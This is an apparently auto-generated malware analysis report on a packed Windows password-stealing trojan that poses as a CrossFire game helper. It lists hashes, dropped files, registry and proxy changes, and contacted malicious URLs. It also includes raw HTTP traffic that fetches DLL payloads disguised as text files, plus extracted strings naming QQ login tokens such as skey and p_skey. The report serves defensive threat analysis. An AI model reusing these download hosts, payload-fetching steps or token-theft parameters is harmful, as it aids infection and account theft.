Gen.Variant.Strictor.115846_da6afddc70

by malwarelabrobot on February 20th, 2017 in Malware Descriptions.

Susp_Dropper (Kaspersky), Gen:Variant.Strictor.115846 (B) (Emsisoft), Gen:Variant.Strictor.115846 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: da6afddc709bf99c8f44945efe6caf49
SHA1: 6bc754b750b8c077457f321b60694e216c534c14
SHA256: ca84817a5816452f053f16d916d545124974352dec483d2f3111d5ac085de4d9
SSDeep: 24576:ztZ CfrRGaFWn3ED YRojjzS08kTutqun8c9 1b6hL7jWOw4gyXSq1iUJL60CDq:zxcyCED7RwXisu8uUCTwiSq1560CDq
Size: 1651712 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-02-05 16:20:56
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-PSW: a Trojan program intended for stealing users' passwords.

Payload

Behaviour Description
EmailWorm: a worm that can send e-mails.


Process activity

The Trojan creates the following process(es):

TcService.exe:2764

The Trojan injects its code into the following process(es):

sesvcs_963_56089.exe:1956
%original file name%.exe:3308

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process TcService.exe:2764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\23.txt (30170 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\01[1].txt (26410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SB1GUIDO.txt (111 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\NamuADLook[1].dll (16650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\26993501420171281319931[1].htm (29233 bytes)
C:\CF_Helper.dll (202 bytes)
%Program Files%\NamuADLook.dll (20370 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\33[1].txt (40 bytes)

The process sesvcs_963_56089.exe:1956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ProgramData\MD PlatForm\3073838834852099154 (15 bytes)
%Program Files%\unstall000.exe (3361 bytes)
C:\ProgramData\tmpst\shst (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XG142QU4.txt (114 bytes)
C:\ProgramData\MD PlatForm\2242737149763168244 (15 bytes)
C:\ProgramData\MD PlatForm\UContext (182 bytes)
C:\ProgramData\MD PlatForm\7 (1 bytes)
C:\ProgramData\MD PlatForm\5 (1 bytes)

The process %original file name%.exe:3308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\TcService.exe (1670 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S0FG29A4.txt (89 bytes)
C:\exdui.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\2672760322016102115848934[1].htm (107215 bytes)

Registry activity

The process TcService.exe:2764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process sesvcs_963_56089.exe:1956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\QuestionASK\APP]
"AppPathName" = "%Program Files%\sesvcs_963_56089.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 40 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:3308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

MD5 File path
15a43a47885c3eff331e97137c08343d c:\CF_Helper.dll
5c7c865bafa4600bf1aca0e60ed8fa5a c:\Program Files\NamuADLook.dll
d342bd6e4b881b21be18a02e2034b01a c:\Program Files\sesvcs_963_56089.exe
d342bd6e4b881b21be18a02e2034b01a c:\Program Files\unstall000.exe
ee904db75d49139181f892ac73859135 c:\TcService.exe
d342bd6e4b881b21be18a02e2034b01a c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\01[1].txt
5c7c865bafa4600bf1aca0e60ed8fa5a c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\NamuADLook[1].dll
c472335b008c5942ec8a162177058111 c:\exdui.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: www.cfzhushou.com
Product Name: www.cfzhushou.com
Product Version: 2.6.0.0
Legal Copyright: Copyright (C) 2017 CF????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.6.0.0
File Description: CF????
Comments: www.cfzhushou.com
Language: Chinese (Simplified, PRC)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 3481600 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 3485696 1622016 1620992 5.54508 019f64b4e813b642777b432d389d114a
.rsrc 5107712 32768 29696 3.76085 57a8228ec969b9e72611e2e156647e31

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/ 115.238.126.133
hxxp://blog.163.com/blog/static/26993501420171281319931/ 115.238.126.133
hxxp://cdct.zhdns.net/aload/as/33.txt
hxxp://xzdownad.zglhsw.com/adpub//01.txt 104.31.197.48
hxxp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll 104.31.197.48
hxxp://publodf.kintip.com.cn/get_apis/paths/UPath0.txt 162.159.211.96
hxxp://publodf.kintip.com.cn/get_apis/paths/lists/urlv8_1.txt 162.159.211.96
hxxp://publodf.kintip.com.cn/get_apis/kword/UContext1.txt 162.159.211.96
hxxp://publodf.kintip.com.cn/get_apis/paths/lists/DH/DHKW.txt 162.159.211.96
hxxp://publodf.kintip.com.cn/ 162.159.211.96
hxxp://down.9udn.com/aload/as/33.txt 122.228.207.207
hxxp://baike2016.blog.163.com/blog/static/26993501420171281319931/ 115.238.126.133


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /aload/as/33.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: down.9udn.com
Cache-Control: no-cache


HTTP/1.0 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:1466"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 19 Feb 2017 03:47:20 GMT
X-Cache: HIT from ctzjwzs2
Via: 1.0 ctzjwzs2 (squid)
Connection: keep-alive
hXXp://xzdownad.zglhsw.com/adpub//01.txt


GET /leesin_2017/blog/static/2672760322016102115848934/ HTTP/1.1
Accept: */*
Referer: hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: blog.163.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 19 Feb 2017 03:41:08 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=414B2F0E31035AC3EA3D8B3BF0A191E4.yqblog15-8010; Domain=.blog.163.com; Path=/
Set-Cookie: usertrack=c 5 hVipE9RwWyGzEX1iAg==; expires=Mon, 19-Feb-18 03:41:08 GMT; domain=.163.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"

<<< skipped >>>

GET /get_apis/paths/UPath0.txt HTTP/1.1
Host: publodf.kintip.com.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:41 GMT
Content-Type: text/plain
Content-Length: 708
Connection: keep-alive
Set-Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701; expires=Mon, 19-Feb-18 03:41:41 GMT; path=/; domain=.kintip.com.cn; HttpOnly
Last-Modified: Fri, 17 Feb 2017 13:16:47 GMT
Accept-Ranges: bytes
ETag: "e491d6172089d21:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b45da0ec5990-VIE



GET /get_apis/paths/lists/urlv8_1.txt HTTP/1.1

Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:42 GMT
Content-Type: text/plain
Content-Length: 52692
Connection: keep-alive
Last-Modified: Sat, 18 Feb 2017 07:54:41 GMT
Accept-Ranges: bytes
ETag: "80768442bc89d21:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b461a15c5990-VIE
<<< skipped >>>

GET /get_apis/kword/UContext1.txt HTTP/1.1

Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:43 GMT
Content-Type: text/plain
Content-Length: 12412
Connection: keep-alive
Last-Modified: Mon, 01 Dec 2014 19:36:36 GMT
Accept-Ranges: bytes
ETag: "b07def1e9edd01:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b469625b5990-VIE

<<< skipped >>>

GET /get_apis/paths/lists/DH/DHKW.txt HTTP/1.1

Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:46 GMT
Content-Type: text/plain
Content-Length: 103236
Connection: keep-alive
Last-Modified: Mon, 01 Dec 2014 19:37:06 GMT
Accept-Ranges: bytes
ETag: "2d4a3309edd01:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b476c3f45990-VIE

<<< skipped >>>

GET / HTTP/1.1

Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Content-Location: hXXp://publodf.kintip.com.cn/iisstart.htm
Last-Modified: Wed, 21 Dec 2016 05:14:24 GMT
ETag: "2c246518495bd21:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b484d5935990-VIE


HEAD /adpub//01.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:22 GMT
Content-Type: text/plain
Content-Length: 563200
Connection: keep-alive
Set-Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681; expires=Mon, 19-Feb-18 03:41:21 GMT; path=/; domain=.zglhsw.com; HttpOnly
Last-Modified: Fri, 17 Feb 2017 17:23:56 GMT
Accept-Ranges: bytes
ETag: "f42d639e4289d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b3e146ed59ae-VIE



GET /adpub//01.txt HTTP/1.1

User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:22 GMT
Content-Type: text/plain
Content-Length: 563200
Connection: keep-alive
Last-Modified: Fri, 17 Feb 2017 17:23:56 GMT
Accept-Ranges: bytes
ETag: "f42d639e4289d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b3e5d77359ae-VIE

<<< skipped >>>

HEAD /aload/cp/NamuADLook.dll HTTP/1.1

User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache
Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:29 GMT
Content-Type: application/x-msdownload
Content-Length: 345088
Connection: keep-alive
Last-Modified: Sun, 22 Jan 2017 08:33:51 GMT
Accept-Ranges: bytes
ETag: "309aa5428a74d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b413e45159ae-VIE



GET /aload/cp/NamuADLook.dll HTTP/1.1

User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:30 GMT
Content-Type: application/x-msdownload
Content-Length: 345088
Connection: keep-alive
Last-Modified: Sun, 22 Jan 2017 08:33:51 GMT
Accept-Ranges: bytes
ETag: "309aa5428a74d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b41634a559ae-VIE

<<< skipped >>>

HEAD /aload/as/33.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: down.9udn.com
Content-Length: 0
Cache-Control: no-cache


HTTP/1.0 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:1466"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 19 Feb 2017 03:47:16 GMT
X-Cache: HIT from ctzjwzs2
Via: 1.0 ctzjwzs2 (squid)
Connection: keep-alive


GET /blog/static/26993501420171281319931/ HTTP/1.1
Accept: */*
Referer: hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: baike2016.blog.163.com
Cache-Control: no-cache
Cookie: usertrack=c 5 hVipE9RwWyGzEX1iAg==


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 19 Feb 2017 03:41:14 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=6940DB1C86E784EA6CBDE5BD19B3ED96.yqblog8-8010; Domain=.blog.163.com; Path=/

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_3308:

wininet.dll
ole32.dll
kernel32.dll
user32.dll
User32.dll
Kernel32.dll
shell32.dll
gdiplus.dll
GdiPlus.dll
Ole32.dll
OleAut32.dll
oleaut32.dll
gzip.dll
ntdll.dll
gdi32.dll
Gdi32.dll
imm32.dll
OLEACC.DLL
advapi32.dll
shlwapi.dll
atl.dll
MsgWaitForMultipleObjects
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
ShellExecuteA
GetProcessHeap
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
UnregisterHotKey
GetUrlCacheEntryInfoA
RegCloseKey
RegCreateKeyA
RegOpenKeyA
GetWindowsDirectoryA
GdiplusShutdown
%d-d-d d:d:d
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
"sMsg":"
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
1970-01-01 08:00:00
[VVV.111Ttt.com]
-URL:
%Program Files%\Internet Explorer\iexplore.exe
crossfire.exe
MsgBox
SysShadow.SubWnd
\exdui.dll
.rsrc
\dwmapi.dll
KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
exdui.dll
CDKEY
CDKEY:
V2.6.0
\CF_data.ini
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://xinzyw.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://VVV.cfzhushou.com
.text
`.rdata
@.data
CF_Helper.dll
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
\CF_Helper.dll
@.reloc
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
Helper.dll
KERNEL32.dll
InternetCrackUrlA
HttpQueryInfoW
WININET.dll
GetCPInfo
zcÁ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
7.84888<8@8
6 696?6{6
14686<6@6
5 5(50585
? ?$?,?@?`?
>$>0>4>8><>
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
WinExec
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
RegOpenKeyExA
RegCreateKeyExA
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDD:\
01/04/17
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0&regmaster=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&service=login&nodirect=0&ptsigx=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
p_skey=
skey=
szNick_name=
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
